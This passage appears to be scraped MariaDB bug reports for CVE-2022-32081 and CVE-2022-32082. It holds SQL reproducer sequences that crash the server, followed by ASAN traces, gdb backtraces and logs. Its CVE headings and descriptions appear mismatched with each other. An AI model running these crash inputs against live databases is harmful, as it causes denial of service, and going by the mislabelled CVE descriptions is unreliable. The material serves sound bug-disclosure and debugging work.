0x6190000d6d60 is located 480 bytes inside of 1152-byte region \[0x6190000d6b80,0x6190000d7000)

allocated by thread T14 here:

    #0 0x7f4812ad5279 in \_\_interceptor\_malloc /build/gcc/src/gcc/libsanitizer/asan/asan\_malloc\_linux.cpp:145

    #1 0x55a3185c76c0 in ut\_allocator<unsigned char, true>::allocate(unsigned long, unsigned char const\*, unsigned int, bool, bool) /experiment/mariadb-server/storage/innobase/include/ut0new.h:375

    #2 0x55a3185c76c0 in mem\_heap\_create\_block\_func(mem\_block\_info\_t\*, unsigned long, unsigned long) /experiment/mariadb-server/storage/innobase/mem/mem0mem.cc:277

    #3 0x55a3184da801 in mem\_heap\_create\_func /experiment/mariadb-server/storage/innobase/include/mem0mem.ic:377

    #4 0x55a3184da801 in ha\_innobase::prepare\_inplace\_alter\_table(TABLE\*, Alter\_inplace\_info\*) /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:7816

    #5 0x55a3176a67d2 in mysql\_inplace\_alter\_table /experiment/mariadb-server/sql/sql\_table.cc:7326

    #6 0x55a3176a67d2 in mysql\_alter\_table(THD\*, st\_mysql\_const\_lex\_string const\*, st\_mysql\_const\_lex\_string const\*, HA\_CREATE\_INFO\*, TABLE\_LIST\*, Alter\_info\*, unsigned int, st\_order\*, bool, bool) /experiment/mariadb-server/sql/sql\_table.cc:10205

    #7 0x55a3177fcf99 in Sql\_cmd\_alter\_table::execute(THD\*) /experiment/mariadb-server/sql/sql\_alter.cc:550

    #8 0x55a31741717f in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:5997

    #9 0x55a3174245a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #10 0x55a31742a60b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #11 0x55a31742f73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #12 0x55a3177eae56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #13 0x55a3177eb33c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #14 0x55a31827bc2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #15 0x7f4812443258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T14 created by T0 here:

    #0 0x7f4812a76fa7 in \_\_interceptor\_pthread\_create /build/gcc/src/gcc/libsanitizer/asan/asan\_interceptors.cpp:216

    #1 0x55a31827bea9 in my\_thread\_create /experiment/mariadb-server/storage/perfschema/my\_thread.h:48

    #2 0x55a31827bea9 in pfs\_spawn\_thread\_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x55a3170ecb3c in inline\_mysql\_thread\_create /experiment/mariadb-server/include/mysql/psi/mysql\_thread.h:1139

    #4 0x55a3170ecb3c in create\_thread\_to\_handle\_connection(CONNECT\*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x55a3170f87b6 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x55a3170f936f in handle\_connections\_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x55a3170fca52 in mysqld\_main(int, char\*\*) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7f4811f17b24 in \_\_libc\_start\_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /experiment/mariadb-server/sql/field.h:1395 in prepare\_inplace\_add\_virtual

Shadow bytes around the buggy address:

  0x0c3280012d50: f7 f7 fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c3280012d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c3280012d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c3280012d80: f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c3280012d90: 00 00 00 00 00 00 f7 00 00 00 00 00 00 00 00 00

\=>0x0c3280012da0: 00 00 00 00 00 00 00 00 00 00 00 f7\[f7\]f7 f7 f7

  0x0c3280012db0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012dc0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012dd0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012de0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012df0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07 

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

\==2119277==ABORTING

GNU gdb (GDB) 10.2

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86\_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

(gdb) (gdb) (gdb) quit

CVE-2022-32081: [MDEV-26420] use-after-poison in Storage - Jira

MariaDB v10.5 to v10.7 was discovered to contain an assertion failure at table->get_ref_count() == 0 in dict0dict.cc.

step to reproduce:

CREATE TEMPORARY TABLE v0 ( v1 TEXT ( 15 ) CHAR SET BINARY NOT NULL NOT NULL UNIQUE CHECK ( v1 ) ) REPLACE SELECT NULL AS v3 , 74 AS v2 ;

 SELECT SQL\_CALC\_FOUND\_ROWS \* FROM v0 WHERE v1 IN ( SELECT v3 FROM v0 ) LIMIT 16 ;

 DROP PROCEDURE v0 ;

 CREATE TABLE v4 ( v6 INT , v5 INT DEFAULT 27 ) ;

 ROLLBACK TO SAVEPOINT v4 ;

 INSERT INTO v4 VALUES ( + 84 , + 32 , 48 ) ;

report (compiled with ASAN):

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7fb65ba7c850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7fb67b328c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55df46af9747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55df45ac1120\]

sigaction.c:0(\_\_restore\_rt)\[0x7fb67ad12870\]

:0(\_\_GI\_raise)\[0x7fb67a7f1d22\]

:0(\_\_GI\_abort)\[0x7fb67a7db862\]

include/ut0ut.h:319(ib::logger& ib::logger::operator<< <int>(int const&))\[0x55df44f00246\]

dict/dict0dict.cc:1258(dict\_sys\_t::evict\_table\_LRU(bool) \[clone .cold\])\[0x55df44f2296e\]

include/dict0dict.h:1578(dict\_sys\_t::unlock())\[0x55df463d955f\]

sql/handler.cc:577(hton\_drop\_table(handlerton\*, char const\*))\[0x55df45ad0145\]

sql/temporary\_tables.cc:703(THD::rm\_temporary\_table(handlerton\*, char const\*))\[0x55df4594c2c8\]

sql/temporary\_tables.cc:1464(THD::free\_tmp\_table\_share(TMP\_TABLE\_SHARE\*, bool))\[0x55df4594d237\]

sql/temporary\_tables.cc:672(THD::drop\_temporary\_table(TABLE\*, bool\*, bool))\[0x55df459513f5\]

sql/sql\_insert.cc:5203(select\_create::abort\_result\_set())\[0x55df452837f5\]

sql/sql\_select.cc:563(handle\_select(THD\*, LEX\*, select\_result\*, unsigned long))\[0x55df454f48a5\]

sql/sql\_table.cc:11732(Sql\_cmd\_create\_table\_like::execute(THD\*))\[0x55df455d8e27\]

sql/sql\_parse.cc:5997(mysql\_execute\_command(THD\*, bool))\[0x55df45359180\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55df453665a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55df4536c60c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55df4537173d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55df4572ce57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55df4572d33d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55df461bdc2c\]

pthread\_create.c:0(start\_thread)\[0x7fb67ad08259\]

:0(\_\_GI\_\_\_clone)\[0x7fb67a8b35e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x6290000873d0): CREATE TEMPORARY TABLE v0 ( v1 TEXT ( 15 ) CHAR SET BINARY NOT NULL NOT NULL UNIQUE CHECK ( v1 ) ) REPLACE SELECT NULL AS v3 , 74 AS v2

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/18

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us        

Core pattern: core

gdb bt:

Using host libthread\_db library "/usr/lib/libthread\_db.so.1".

Core was generated by \`/usr/local/mysql/bin//mysqld --port 10018 --datadir=/home/fuboat/mariadb-tmp/18'.

Program terminated with signal SIGABRT, Aborted.

#0  0x00007fb67ad0f808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055df45ac106b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x00007fb67a7f1d22 in raise () from /usr/lib/libc.so.6

#4  0x00007fb67a7db862 in abort () from /usr/lib/libc.so.6

#5  0x000055df44f00246 in ut\_dbg\_assertion\_failed (expr=expr@entry=0x55df4700bd40 "table->get\_ref\_count() == 0", file=file@entry=0x55df4700ae60 "/experiment/mariadb-server/storage/innobase/dict/dict0dict.cc", line=line@entry=1890) at /experiment/mariadb-server/storage/innobase/ut/ut0dbg.cc:60

#6  0x000055df44f2296e in dict\_sys\_t::remove (this=<optimized out>, this@entry=0x55df478238c0 <dict\_sys>, table=0x61700003ff08, lru=<optimized out>, lru@entry=false, keep=<optimized out>, keep@entry=true) at /experiment/mariadb-server/storage/innobase/dict/dict0dict.cc:1890

#7  0x000055df463d955f in ha\_innobase::delete\_table (this=<optimized out>, name=<optimized out>) at /experiment/mariadb-server/storage/innobase/handler/ha\_innodb.cc:13360

#8  0x000055df45ad0145 in hton\_drop\_table (hton=<optimized out>, path=<optimized out>) at /experiment/mariadb-server/sql/handler.cc:576

#9  0x000055df4594c2c8 in THD::rm\_temporary\_table (this=<optimized out>, base=<optimized out>, path=0x61a000061d48 "/tmp/#sql-temptable-3021ca-4-0") at /experiment/mariadb-server/sql/temporary\_tables.cc:703

#10 0x000055df4594d237 in THD::free\_tmp\_table\_share (this=<optimized out>, share=0x61a000061898, delete\_table=<optimized out>) at /experiment/mariadb-server/sql/temporary\_tables.cc:1462

#11 0x000055df459513f5 in THD::drop\_temporary\_table (this=0x62b0000bd218, table=<optimized out>, is\_trans=is\_trans@entry=0x0, delete\_table=delete\_table@entry=true) at /experiment/mariadb-server/sql/temporary\_tables.cc:669

#12 0x000055df451da338 in drop\_open\_table (thd=<optimized out>, table=<optimized out>, db\_name=<optimized out>, table\_name=<optimized out>) at /experiment/mariadb-server/sql/sql\_base.cc:1355

#13 0x000055df452837f5 in select\_create::abort\_result\_set (this=0x6290000890c8) at /experiment/mariadb-server/sql/sql\_insert.cc:5202

#14 0x000055df454f48a5 in handle\_select (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x6290000890c8, setup\_tables\_done\_option=setup\_tables\_done\_option@entry=0) at /experiment/mariadb-server/sql/sql\_select.cc:563

#15 0x000055df455d8e27 in Sql\_cmd\_create\_table\_like::execute (this=<optimized out>, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_table.cc:11732

#16 0x000055df45359180 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:5997

#17 0x000055df453665a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#18 0x000055df4536c60c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#19 0x000055df4537173d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#20 0x000055df4572ce57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#21 0x000055df4572d33d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#22 0x000055df461bdc2c in pfs\_spawn\_thread (arg=0x617000005b98) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#23 0x00007fb67ad08259 in start\_thread () from /usr/lib/libpthread.so.0

#24 0x00007fb67a8b35e3 in clone () from /usr/lib/libc.so.6

CVE-2022-32082: [MDEV-26433] assertion: table->get_ref_count() == 0 in dict0dict.cc line 1915

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component Item_func_in::cleanup/Item::cleanup_processor.

CREATE TABLE v0 ( v1 VARCHAR ( 65 ) CHAR SET ASCII NULL DEFAULT ( 'x' IN ( 'x' , CURRENT\_USER ) ) ) ;

 START TRANSACTION READ WRITE ;

 INSERT INTO v0 VALUES ( v1 ) ;

 SELECT HEX ( GREATEST ( v1 , ( 'x' ) ) ) FROM v0 ;

 INSERT INTO v0 VALUES ( REPEAT ( ( NULL + 84551986.000000 ) = 74599462.000000 , ( HEX ( 18069096.000000 ) ) / -1 = 28 ) ) ;

 DESCRIBE SELECT v0 . v1 FROM v0 , v0 WHERE v0 . v1 = v0 . v1 ;

2021-08-16 14:41:38 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:41:38 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:38 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld (initiated by: root\[root\] @ localhost \[\]): Normal shutdown

2021-08-16 14:41:39 0 \[Note\] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 \[Note\] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 \[Note\] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:39 0 \[Note\] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 \[Note\] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 \[Note\] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 15:00:28 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 15:00:28 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 15:00:28 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 15:00:28 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 15:00:28 0 \[Note\] InnoDB: Using liburing

2021-08-16 15:00:28 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 15:00:28 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 15:00:39 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 15:00:39 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 15:00:39 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 15:00:39 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 15:00:39 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 15:00:39 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/9/ib\_buffer\_pool

2021-08-16 15:00:39 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 15:00:40 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 15:00:40 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 15:00:40 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 15:00:40

2021-08-16 15:00:41 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/9.socket'  port: 10009  Source distribution

210816 15:00:43 \[ERROR\] mysqld got signal 11 ;

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed, 

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f987ba5b850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f989b307c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55bb57c35747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55bb56bfd120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f989acf1870\]

sql/item\_cmpfunc.h:2556(Item\_func\_in::cleanup())\[0x55bb561f90ee\]

sql/item.cc:574(Item::cleanup\_processor(void\*))\[0x55bb56c4adbc\]

sql/item.h:5439(Item\_func\_or\_sum::walk(bool (Item::\*)(void\*), bool, void\*))\[0x55bb561fb774\]

sql/table.cc:3616(fix\_session\_vcol\_expr(THD\*, Virtual\_column\_info\*))\[0x55bb567afd3a\]

sql/sql\_base.cc:5433(TABLE::fix\_vcol\_exprs(THD\*))\[0x55bb5632124f\]

sql/sql\_base.cc:5467(lock\_tables(THD\*, TABLE\_LIST\*, unsigned int, unsigned int))\[0x55bb56321f93\]

sql/sql\_base.cc:5261(open\_and\_lock\_tables(THD\*, DDL\_options\_st const&, TABLE\_LIST\*, bool, unsigned int, Prelocking\_strategy\*))\[0x55bb56326800\]

sql/sql\_base.h:397(open\_and\_lock\_tables(THD\*, TABLE\_LIST\*, bool, unsigned int))\[0x55bb563dcef4\]

sql/sql\_parse.cc:4565(mysql\_execute\_command(THD\*, bool))\[0x55bb56495bb8\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55bb564a25a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55bb564a860c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55bb564ad73d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55bb56868e57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55bb5686933d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55bb572f9c2c\]

pthread\_create.c:0(start\_thread)\[0x7f989ace7259\]

:0(\_\_GI\_\_\_clone)\[0x7f989a8925e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): INSERT INTO v0 VALUES ( REPEAT ( ( NULL + 84551986.000000 ) = 74599462.000000 , ( HEX ( 18069096.000000 ) ) / -1 = 28 ) )

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/9

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us        

Core pattern: core

GNU gdb (GDB) 10.2

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86\_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

\[New LWP 321844\]

\[New LWP 272301\]

\[New LWP 315980\]

\[New LWP 272464\]

\[New LWP 272465\]

\[New LWP 272438\]

\[New LWP 313382\]

\[New LWP 313342\]

\[New LWP 315981\]

\[New LWP 315984\]

\[New LWP 315982\]

\[New LWP 321828\]

\[New LWP 331506\]

\[New LWP 331509\]

\[New LWP 272143\]

\[New LWP 315983\]

\[Thread debugging using libthread\_db enabled\]

Using host libthread\_db library "/usr/lib/libthread\_db.so.1".

Core was generated by \`/usr/local/mysql/bin//mysqld --port 10009 --datadir=/home/fuboat/mariadb-tmp/9'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  0x00007f989acee808 in pthread\_kill () from /usr/lib/libpthread.so.0

\[Current thread is 1 (Thread 0x7f987ba5c240 (LWP 321844))\]

(gdb) (gdb) #0  0x00007f989acee808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055bb56bfd06b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x000055bb561f90ee in Item\_func\_in::cleanup (this=0x6190000a3dd8) at /experiment/mariadb-server/sql/item\_cmpfunc.h:2556

#4  0x000055bb56c4adbc in Item::cleanup\_processor (arg=<optimized out>, this=<optimized out>) at /experiment/mariadb-server/sql/item.cc:572

#5  Item::cleanup\_processor (this=<optimized out>, arg=<optimized out>) at /experiment/mariadb-server/sql/item.cc:569

#6  0x000055bb561fb774 in Item\_func\_or\_sum::walk (this=0x6190000a3dd8, processor=<optimized out>, walk\_subquery=<optimized out>, arg=0x0) at /experiment/mariadb-server/sql/item.h:5439

#7  0x000055bb567afd3a in fix\_session\_vcol\_expr (vcol=0x6190000a3f58, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/table.cc:3614

#8  fix\_session\_vcol\_expr (thd=0x62b0000bd218, vcol=0x6190000a3f58) at /experiment/mariadb-server/sql/table.cc:3608

#9  0x000055bb5632124f in TABLE::fix\_vcol\_exprs (thd=0x62b0000bd218, this=0x6190000a3298) at /experiment/mariadb-server/sql/sql\_base.cc:5434

#10 TABLE::fix\_vcol\_exprs (this=0x6190000a3298, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5426

#11 0x000055bb56321f93 in fix\_all\_session\_vcol\_exprs (tables=0x629000087408, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5465

#12 lock\_tables (thd=thd@entry=0x62b0000bd218, tables=0x629000087408, count=<optimized out>, flags=flags@entry=0) at /experiment/mariadb-server/sql/sql\_base.cc:5649

